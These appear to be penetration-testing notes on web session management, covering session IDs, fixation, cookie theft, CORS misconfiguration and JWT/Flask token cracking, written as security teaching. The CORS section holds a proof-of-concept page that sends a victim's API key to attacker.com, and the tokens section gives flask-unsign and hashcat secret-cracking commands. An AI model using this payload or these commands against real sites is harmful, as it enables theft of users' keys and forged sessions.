
# Session Management

The purpose of a session is to associate an authenticated account with the resources it is specifically allowed to access. HTTP is stateless, which is why cookies are generally used to maintain user sessions.

Sessions are implemented by the server or the web framework, and may also be written from scratch by the site developer.

#### Identifiers

A session identifier uniquely identifies an authenticated session. It can be located in a cookie, a custom HTTP header, a URL parameter, or a hidden form field.

#### Predictability

Gather enough session IDs to determine whether they share a common pattern or component. This generally requires specialized tools, hardware, or access to the source code. Determine whether the IDs are hashes. Are the sessions sequential?

Gather sessions manually, with a script, or using tools like Burp's Sequencer.

#### Session Fixation

This flaw occurs when a session ID assigned before authentication continues to be used after authentication, rather than being regenerated at login. It is very potent when combined with a phishing attack.
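As an added example (not code from the original notes), here is the flaw and its mitigation side by side in Python: a constructed in-memory session store whose `login_vulnerable` keeps the pre-authentication ID and whose `login_fixed` regenerates it at the login boundary. The class and function names (`SessionStore`, `simulate`) are hypothetical.

```python
import secrets

# Added example: an in-memory session table standing in for a server's
# session store. All names here are hypothetical, not from any framework.
class SessionStore:
    def __init__(self):
        self._sessions = {}  # session id -> username (None until authenticated)

    def new_session(self):
        """Issue an unpredictable, anonymous pre-authentication session ID."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = None
        return sid

    def user_for(self, sid):
        """Resolve a presented ID to its user; None if unknown or anonymous."""
        return self._sessions.get(sid)

    def login_vulnerable(self, sid, username):
        """Fixation-prone login: the ID the client arrived with is upgraded to
        authenticated, so anyone who knew it beforehand now owns the session."""
        if sid not in self._sessions:
            raise KeyError("unknown session")
        self._sessions[sid] = username
        return sid

    def login_fixed(self, sid, username):
        """Mitigated login: discard the pre-auth session and issue a fresh ID,
        so the previously known ID resolves to nothing afterwards."""
        self._sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = username
        return new_sid


def simulate(login_method):
    """Client arrives with a server-issued pre-auth ID (one a third party could
    have learned, e.g. via a phishing link) and then logs in. Reports whether
    the ID was rotated and what the pre-auth ID resolves to after login."""
    store = SessionStore()
    pre_auth = store.new_session()
    post_auth = getattr(store, login_method)(pre_auth, "alice")
    return {
        "rotated": post_auth != pre_auth,
        "pre_auth_user": store.user_for(pre_auth),   # "alice" means fixation
        "post_auth_user": store.user_for(post_auth),
    }
```

Compare `simulate("login_vulnerable")` with `simulate("login_fixed")`: only in the vulnerable path does the pre-authentication ID still resolve to the logged-in user.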

#### Stealing Sessions

XSS may be able to steal a session ID if the cookie is not set to HttpOnly.

## CORS Exploits

We can exploit `Access-Control-Allow-Origin` if the server reflects arbitrary `Origin` request headers into it, since the browser will then let our page read the cross-origin response. This can lead to API keys being stolen from users! We can use native JavaScript AJAX to read the information returned by the server.

```markup
<html>
    <head>
        <title>CORS Exploit POC</title>
    </head>
    <body>
        <script>
            // Cross-origin request; withCredentials makes the browser attach the victim's cookies
            var req = new XMLHttpRequest();
            req.onload = reqListener;
            req.open('get', 'https://api.m4lwhere.org/api/v1/getApiKey', true);
            req.withCredentials = true;
            req.send();
            // Runs once the response is readable, i.e. only if the CORS headers allowed it
            function reqListener() {
                location = '//attacker.com/log?key=' + this.responseText;
            }
        </script>
    </body>
</html>
```

{% embed url="https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties" %}

## Web Tokens

JWTs and other tokens are used frequently in web apps. They carry user and session information and are generally signed with a secret key for integrity. We can either attempt to crack the signing key or attempt to have the server accept a token that is not signed at all.

```bash
# Recover a Flask session signing secret from a cookie using a wordlist, 8 threads
flask-unsign -u -c "eyJ1c2VybmFtZSI6IkFub255bW91c19Vc2VyIn0.X2h0pQ.BH7pliC3PH_YFeLJDEc2i_Uc7I4" --wordlist /home/kali/Desktop/rockyou.txt --no-literal-eval --threads 8
# Brute-force a JWT HMAC secret with hashcat's JWT mode (-m 16500) and a 4-digit mask (-a 3)
hashcat jwt.txt -m 16500 -a 3 ?d?d?d?d
```

{% embed url="https://jwt.io/#debugger-io" %}

## References

{% embed url="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/06-Session_Management_Testing/README.html" %}

